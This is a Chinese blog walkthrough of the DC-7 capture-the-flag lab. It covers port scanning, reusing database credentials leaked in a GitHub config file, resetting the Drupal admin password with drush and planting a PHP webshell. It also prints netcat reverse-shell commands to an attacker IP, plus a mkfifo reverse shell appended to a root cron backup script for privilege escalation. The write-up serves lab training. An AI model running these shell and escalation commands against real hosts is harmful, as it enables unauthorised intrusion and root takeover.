当前位置: 首页 > news >正文

【安全靶场】-DC-7

❤️博客主页 iknow181
🔥系列专栏 网络安全、 Python、JavaSE、JavaWeb、CCNP
🎉欢迎大家点赞👍收藏⭐评论✍


在这里插入图片描述

一、收集信息

1.查看主机是否存活

nmap -T4 -sP 192.168.216.149

2.主动扫描

看开放了哪些端口和功能

nmap -A -p- 192.168.216.149

发现
22-ssh

80-http

3.whatweb扫描

发现有网站,进一步确认

4.搜索作者

发现下面有作者

去github上搜索一下,有没有相关内容

点击users,看

找到一个config.php文件,这是一个连接数据库的配置文件,里面有用户名和密码,可能和他的vps或者服务器的用户名密码匹配的

二、入侵目标主机

1.尝试进行ssh登录

2.查看文件

发现执行了/opt/scripts/backups.sh文件,生成了那些.gz的文件

3.进入文件夹

发现是一个备份数据库的sh文件,有可能是定时任务执行

4.利用drush

因为是drupal,所有有个drush命令

drush可以修改管理员用户

进入网站的根目录,修改管理员密码为123456(注意命令不要有空格)

5.进入网站后台

可以看到有个login

可以进入192.168.216.149/user/login,登录admin

进入content,编辑文章

最好能写入php代码

6.安装php插件

整一个drupal的php插件

加载安装包

安装成功

勾选php filter,并且激活

回到content发现有phpcode

7.生成木马文件写入

将其复制到content中

7.连接

8.nc连接

因为这个木马可能不太稳定

kali:nc -lvp 9988

目标:nc -e /bin/bash 192.168.216.161 9988

连接成功

9.美化界面

python -c 'import pty;pty.spawn("/bin/bash")'

三、提权

1.kali监听1234端口

2.将命令写入backups.sh

因为backups.sh是一个计划任务,用的root权限

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.216.161 1234 > /tmp/f" >> backups.sh"

3.等待计划任务执行

4.拿到flag

在这里插入图片描述


http://www.mrgr.cn/news/2288.html

相关文章:

  • 模型量化方法-GPTQ
  • 杰发科技AC7840——CAN通信简介(8)_通过波特率和时钟计算SEG_1/SEG_2/SJW/PRESC
  • 哈希字符串映射
  • python-字符串操作(赛氪OJ)
  • 22 mysql数据库主从搭建
  • 打卡学习Python爬虫第二天|HTTP协议
  • Linux驱动入门实验班——步进电机模块驱动(附百问网视频链接)
  • QT-计算器
  • 数据结构(6_2_3)——十字链表法和多重领接表
  • 32位入门级MCU(ARM Cortex-M3内核)STM32F103系列
  • 计算机基础知识复习8.14
  • 4款AI 生成 PPT的工具,帮你赶上演示文稿的新趋势!
  • HTML静态网页成品作业(HTML+CSS)——花主题介绍网页设计制作(1个页面)
  • Tomcat 部署与优化
  • 探索生成式AI在文档处理中的应用:llm Whisperer
  • 数字媒体产业发展现状剖析,洞悉数字产业园的创新之举
  • HCIP | 三层架构
  • 如何在HTML中创建链接?什么是CSS定位?什么是CSS优化?
  • JavaScript语法基础之流程结构(顺序、选择、循环结构)
  • XXX【5】观察者模式